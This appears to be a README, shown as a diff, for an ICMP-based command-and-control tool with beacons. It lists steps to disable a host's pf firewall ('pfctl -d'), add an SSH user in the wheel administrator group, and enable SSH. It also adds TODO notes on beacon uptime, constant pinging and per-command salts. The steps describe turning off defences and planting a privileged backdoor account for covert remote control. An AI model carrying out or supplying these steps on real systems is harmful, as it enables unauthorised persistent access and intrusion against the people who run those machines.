jacob-doll/icmpc2/README.md

 1. run pfctl -d
 2. add a new ssh user (pw user add -n marlena -c 'Marlean Root' -d /home/marlena -G wheel -m -s /usr/local/bin/bash)
 3. enable ssh

+# TODO

+- check for beacon uptime (add ttl for each host)
+- have each beacon constantly ping (thread)
+- each command will have its own salt